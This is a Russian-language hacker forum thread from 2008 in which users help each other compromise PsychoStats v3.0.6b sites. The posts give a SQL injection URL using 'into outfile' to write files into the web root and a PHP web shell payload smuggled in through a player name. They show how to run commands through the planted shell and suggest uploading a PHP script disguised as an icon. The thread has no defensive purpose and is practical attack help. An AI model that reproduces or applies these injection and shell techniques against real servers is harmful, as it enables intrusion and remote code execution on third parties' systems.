Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.01.2008, 15:08
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
папка с базами мускула как правило находится далеко от папок веба, поэтому
вот это
outfile './../../..path/file.txt')
бесполезно \n =)
а уж если есть локал пшп инж, то проще залить в /tmp , в неё то всегда записать можно)
|
|
|
17.01.2008, 14:05
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
Там еще можно иконку заливать в профиле (Хотя я не везде видел).Так вот, вместо нее заливаем пхп скрипт ) Только не помню, называем 1.ico.php - так кажется
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
17.01.2008, 15:35
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
не могу зарегать юзера что надо в поле Player Name: когда вписываю имя у меня не регится а пишет только Unique ID does not exist что делать ?
|
|
|
|
17.01.2008, 17:54
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Т.к. большинство ников в стате висят только потому, что с ними играли в самой игре кс, то можно взять и зарегать этот ник на себя  Чтобы залить шелл обязательно нужно состоять в клане! Так что регай ник, который уже состоит в клане. Если так не получится, тогда заходи в игру, поиграй чуток и в клан войди |
|
|
|
22.01.2008, 23:44
|
|
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме:
125281
Репутация:
1
|
|
я звиняюсь у мя проблемы с мускульными запросами:
...сlan.php?id=3&psort=(-deaths*(select 1 into outfile 'd:/system/...
поясните плз сдесь в файл по пути d:/system/.... записывается эм.. инфа о участниках клана...
я прошу пояснить так как у меня возникла проблема ... как понял для того чтобы пхп-шлл заработал.... надо вывисти в файл одну строку с пхп-имем 1-ого участника клана...
а у мя в файл выводится инфа о всех пользователях клана и врезультате запуска шела выкидывает страничку с ошибкой
Warning: system() [function.system]: Cannot execute a blank command in W:\www\cs\3.php on line 1
123@ya.ru 0 \N \N 74 70 2008-01-05 2008-01-10 16.52 0 1 1 100.00 3 75.00 4 1.68 1 0.42 17 0 130 42 26 32 28 41.18 9312 105 9 0 0.00 2 3.33 31 0 12 20.00 340 0 0 0 0 0 60 5 0.57 0.27 1199981440 13496 0 0.00 238 2058 34.30 0 63 34 47 40 58.82 11 0 0 0 0 70 [клан]ник 1199539878 8 1558 1539 8647.34 9028.42 1199981440 1 [клан]ник 58
Warning: system() [function.system]: Cannot execute a blank command in W:\www\cs\3.php on line 2
123@mail.ru 1 \N \N
Плз ..подскажите что не так делаю...
п.с.
на этом примере
http://сайт/cs/clan.php?id=8&psort=(-deaths*(select 1 into outfile 'w:/www/cs/123.txt'))&porder=desc
|
|
|
|
23.01.2008, 00:08
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Для того, чтобы пхп-шелл заработал надо, чтобы в тексте оказалась строчка <?php system($cmd);?> Да, в этом когда записываешь через into outfile, в файле оказывается информация о всех участниках. Имя одного из них(любого) должно быть как раз-таки шеллом. php-код обрабатывается как язык программирования, только лишь в случае встречи спецтегов <? ... ?>
Запиши в ТХТ файл и покажи, что у тебя там записалось.
|
|
|
|
23.01.2008, 01:01
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
nightmare007, запускай скрипт так
http://сайт/cs/3.php?cmd=[команда]
например
http://сайт/cs/3.php?cmd=id
У тебя в ошибке написано
Cannot execute a blank command in W:\www\cs\3.php on line 1
Невозможно выполнить пустую команду, т к ты не задал переменную $cmd
|
|
|
|
23.01.2008, 01:11
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605
Репутация:
13
|
|
а для какой версии PsychoStats все это проходит то?
|
|
|
|
23.01.2008, 01:15
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Которая в статье - "Powered by PsychoStats v3.0.6b © 2006".
А чтобы узнать уязвима стата или нет, проведи скл-инъекцию после 'order by'.
|
|
|
|
23.01.2008, 03:15
|
|
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме:
125281
Репутация:
1
|
|
вот что в текстовом файле:
2458 2488 2008-01-10 2008-01-10 13.05 0 0 0 0.00 0 0.00 0 0.00 0 0.00 0 0 3 31 26 28 19 100.00 1700 31 9 2 6.45 0 0.00 3 0 4 15.38 50 0 0 0 0 0 26 4 0.84 0.38 1199984503 4141 0 0.00 51 383 14.73 0 0 0 0 0 0.00 -18 0 0 0 0 2488 CyCLiK[LG] 1199979967 145 1314 603 9345.09 10000.00 1199984503 1 CyCLiK[LG] \N CyCLiK[LG] BY 0 BY Belarus
2401 2431 2008-01-10 2008-01-10 17.69 0 0 0 0.00 5 71.43 7 4.64 3 1.99 9 0 444 14 11 12 10 15.63 8985 82 5 0 0.00 0 0.00 18 0 20 28.57 256 0 0 0 0 0 70 5 0.85 0.38 1199988075 10994 0 0.00 151 1447 20.67 0 68 59 36 54 84.38 49 0 0 0 0 2431 KyJIu6a[LG] 1199965668 145 1254 969 9470.87 10000.00 1199988075 1 KyJIu6a[LG] 62 <?php system($cmd);?> 123@maill.ru BY 0 BY Belarus
обратил внимание на <?php system($cmd);?> точку с запятой ..d) ;?>.. но без результатно что с ней что без неё показывает ошибку и всотут |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
